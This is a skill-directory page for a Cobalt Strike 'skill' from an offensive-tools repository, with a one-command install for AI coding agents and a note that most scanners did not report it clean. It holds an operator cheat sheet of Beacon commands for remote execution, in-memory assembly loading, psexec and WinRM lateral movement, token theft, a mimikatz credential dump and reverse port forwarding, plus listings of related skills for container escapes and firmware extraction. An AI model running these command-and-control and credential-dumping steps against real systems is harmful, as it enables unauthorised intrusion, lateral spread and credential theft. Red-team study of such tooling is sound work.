offensive-tools/c2/cobalt-strike/SKILL.md
Cobalt Strike: commercial adversary simulation platform with Beacon implant supporting HTTP/S, DNS, SMB, TCP, and Malleable C2 profiles. Use when operating professional red team engagements, simulating advanced threat groups, managing multi-operator teamserver infrastructure, or executing BOFs.
npx skillsauth add aeondave/malskill cobalt-strikeInstall this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.
3 of 9 scanners reported clean
Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.
Commercial adversary simulation with Beacon implant.
./teamserver <ip> <password> [malleable-profile]
./cobaltstrike
| Command | Purpose |
|---------|---------|
| shell <cmd> | Run via cmd.exe |
| run <cmd> | Execute directly |
| powerpick <ps> | Unmanaged PowerShell |
| execute-assembly <dll> <args> | In-memory .NET execution |
| inline-execute <bof> | Execute BOF in Beacon |
| jump psexec <target> <listener> | Lateral movement via SMB |
| jump winrm64 <target> <listener> | Lateral via WinRM |
| steal_token <pid> | Token impersonation |
| mimikatz sekurlsa::logonpasswords | Kiwi credential dump |
| socks 1080 | SOCKS proxy |
| rportfwd <lp> <host> <rp> | Reverse port forward |
Profiles modify Beacon network fingerprint. Key sections: http-get, http-post, stage, process-inject.
./c2lint malleable-profile.profile
| File | When to load |
|------|--------------|
| references/ | Aggressor Script, BOF development, Malleable profile examples |
development
White-box auditing methodology for AI-generated ('vibe-coded') applications. Focuses on modern stack misconfigurations (Supabase, Next.js, Vercel).
development
Hybrid AI/Deterministic SAST methodology for discovering zero-day vulnerabilities in source code. Orchestrates structural search with AI-driven data flow and sink validation.
development
Auth assessment: hardware/embedded methodology; UART/JTAG/SWD/SPI/I2C, firmware extraction, boot/debug paths, embedded OS evidence.
devops
Container methodology: Identifying containerization limits, Docker/K8s misconfigurations, and executing escapes to the host node.